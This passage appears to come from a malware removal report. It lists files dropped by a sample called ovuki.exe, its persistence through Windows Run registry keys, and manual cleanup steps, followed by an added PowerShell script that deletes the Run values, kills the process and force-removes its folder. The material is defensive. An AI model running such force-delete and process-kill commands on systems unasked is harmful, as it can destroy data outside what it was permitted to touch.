    %System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
    %System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
    %WinDir%\MedCtrOC.log (8910 bytes)
    %System%\config\SYSTEM.LOG (5193 bytes)
    %System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
    %System%\SET27.tmp (601 bytes)
    %System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
    %System%\SET11.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
    %WinDir%\Help\SETC5.tmp (12287 bytes)
    %System%\SET8.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
    %WinDir%\msgsocm.log (6541 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
    %System%\SETF.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
    %System%\SET10.tmp (2 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
    %System%\SET26.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
    %System%\SET21.tmp (35 bytes)
    %System%\config\system (2630 bytes)
    %System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
    %System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
    %WinDir%\SECD0.tmp (1897 bytes)
    %System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
    %WinDir%\imsins.log (3792 bytes)
    %System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
    %System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
    %System%\SET16.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
    %System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
    %System%\CatRoot2\dberr.txt (1031 bytes)
    %System%\SETB.tmp (1281 bytes)
    %System%\SET1F.tmp (1 bytes)
    %WinDir%\iis6.log (135629 bytes)
    %WinDir%\comsetup.log (48646 bytes)
    %System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
    %System%\spupdsvc.exe (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
    %System%\SET28.tmp (22 bytes)
    %System%\SET5.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
    %System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
    %System%\SET31.tmp (673 bytes)
    %System%\SET2E.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
    %System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
    %System%\SET29.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
    %System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
    %System%\SET2C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
    %WinDir%\KB968930.log (245581 bytes)
    %System%\SET15.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
    %WinDir%\ntdtcsetup.log (22997 bytes)
    %System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
    %WinDir%\inf\oem10.inf (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
    %System%\SET24.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
    %System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
    %System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
    %WinDir%\FaxSetup.log (53338 bytes)
    %WinDir%\tsoc.log (79170 bytes)
    %System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
    %WinDir%\KB968930xp.cat (59 bytes)
    %System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
    %System%\winrm\0409\SET1D.tmp (601 bytes)
    %System%\SETD.tmp (601 bytes)
    %WinDir%\inf\SET19.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
    %System%\SET9.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
    %System%\winrm\0409\SET37.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
    %System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
    %WinDir%\ocgen.log (71000 bytes)
    %System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
    %System%\SET2F.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
    %System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
    %System%\SET30.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
    %System%\wbem\SET1E.tmp (4 bytes)
    %System%\SET23.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
    %WinDir%\netfxocm.log (9089 bytes)
    %System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
    %WinDir%\inf\SET33.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (70080 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
    %WinDir%\assembly\tmp\SADGJMPS\Microsoft.PowerShell.Editor.dll (32824 bytes)
    %WinDir%\assembly\tmp\WEHLORUX\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
    %WinDir%\assembly\tmp\FY147ADG\Microsoft.PowerShell.Security.dll (2392 bytes)
    %WinDir%\assembly\tmp\HZ369CFI\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\CUX036AD\Microsoft.WSMan.Runtime.dll (7 bytes)
    %WinDir%\assembly\tmp\J369CFIL\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
    %WinDir%\assembly\tmp\CUX0369C\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
    %WinDir%\assembly\tmp\7PSVY147\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\O7BEHKNQ\Microsoft.PowerShell.Security.resources.dll (9 bytes)
    %WinDir%\assembly\tmp\2LORUX03\Microsoft.WSMan.Management.dll (9608 bytes)
    %WinDir%\assembly\tmp\I0369CGJ\System.Management.Automation.resources.dll (9320 bytes)
    %WinDir%\assembly\tmp\9RUX0369\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
    %WinDir%\assembly\tmp\4NQTWZ36\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
    %WinDir%\assembly\tmp\GZ258C0P\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
    %WinDir%\assembly\tmp\RADGJMPS\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
    %WinDir%\assembly\tmp\ZILORUX0\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
    %WinDir%\assembly\tmp\2LOSVY14\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\CVY147AD\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
    %WinDir%\assembly\tmp\BTWZ258B\Microsoft.WSMan.Management.resources.dll (13 bytes)
    %WinDir%\assembly\tmp\4NQTW036\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
    %WinDir%\assembly\tmp\ZHKNQUX0\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\P8BEHKNR\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
    %WinDir%\assembly\tmp\HZ258BEH\System.Management.Automation.dll (81046 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (166 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\uk-ua[1].htm (29849 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ovuki\ovuki.exe (259 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (166 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\%CurrentUserName%\local settings\application data\ovuki\ovuki.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\%CurrentUserName%\local settings\application data\ovuki\ovuki.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
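The following script is an added example and is not part of the Lavasoft report: it carries out step 4 (both Run keys) and the ovuki.exe entry of step 3 from a PowerShell prompt instead of regedit. Two details of the report drive its design. First, the report records only the launch path under each Run key, not the value name, so the script inspects every value under both keys and matches on the value's data as well as its name. Second, the report's file list shows the sample fetching and executing WindowsXP-KB968930-x86-ENG.exe, which is Microsoft's Windows Management Framework Core for XP (PowerShell 2.0 and WinRM 2.0); the WindowsPowerShell\v1.0 and winrm files, the ngen runs over Microsoft.PowerShell.*.dll and KB968930.log all come from that installer, so PowerShell 2.0 is present on an infected XP SP3 host even though it does not ship with XP. Assumptions: the script runs elevated (the HKLM value points into a user profile, which implies the sample ran with administrative rights), and it runs as the infected user, since HKCU is that user's hive. The -WhatIf switch previews every change without applying it.

```powershell
# Added example, not the report's own procedure: remove the ovuki.exe Run values
# (step 4) and the dropped directory (step 3). Run elevated, as the infected user,
# from PowerShell 2.0 or later. Use -WhatIf to preview.
[CmdletBinding(SupportsShouldProcess = $true)]
param()

$marker  = 'ovuki\ovuki.exe'   # path fragment taken from the report's file list
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
)
# Note properties Get-ItemProperty attaches to every result; they are not registry values.
$psMeta = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $values = Get-ItemProperty -Path $key
    foreach ($prop in $values.PSObject.Properties) {
        if ($psMeta -contains $prop.Name) { continue }
        $data = [string]$prop.Value
        # The report gives the launch path but not the value name, so match on either.
        if ($prop.Name -like "*$marker*" -or $data -like "*$marker*") {
            if ($PSCmdlet.ShouldProcess("$key : $($prop.Name) = $data", 'Remove Run value')) {
                Remove-ItemProperty -Path $key -Name $prop.Name
            }
        }
    }
}

# The dropped binary lives under the per-user Local Application Data folder
# (on XP: %USERPROFILE%\Local Settings\Application Data). GetFolderPath resolves
# that folder on any Windows version, so the script is not tied to the XP layout.
$dropDir = Join-Path ([Environment]::GetFolderPath('LocalApplicationData')) 'ovuki'
if (Test-Path $dropDir) {
    # Stop a running copy first; otherwise the delete fails with a sharing violation.
    Get-Process -Name 'ovuki' -ErrorAction SilentlyContinue | Stop-Process -Force
    if ($PSCmdlet.ShouldProcess($dropDir, 'Remove dropped directory')) {
        Remove-Item -Path $dropDir -Recurse -Force
    }
}
```

If the infected account is not the one you are logged on as, the HKCU branch will miss its Run value; either run the script in that user's session or load the account's NTUSER.DAT under HKEY_USERS and adjust the key path. Rerun without -WhatIf only after the preview lists exactly the ovuki entries, then continue with steps 5 and 6 above.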
